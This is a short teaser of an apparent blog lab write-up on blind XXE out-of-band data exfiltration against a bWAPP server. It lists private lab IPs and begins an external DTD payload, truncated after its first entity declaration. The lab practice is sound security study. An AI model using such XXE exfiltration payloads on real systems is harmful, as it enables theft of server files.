Blind XXE – Exfiltration Data via OOB
My lab
Kali Linux:192.168.171.134
bWApp Server: http://192.168.171.131
I want to do an exfiltration data via HTTP on this Blind XXE.
I’ll use the Portswigger Payload.
This is the External.DTD:
<!ENTITY % eval "<!ENTITY &a… Continue reading Blind XXE – Exfiltration Data via OOB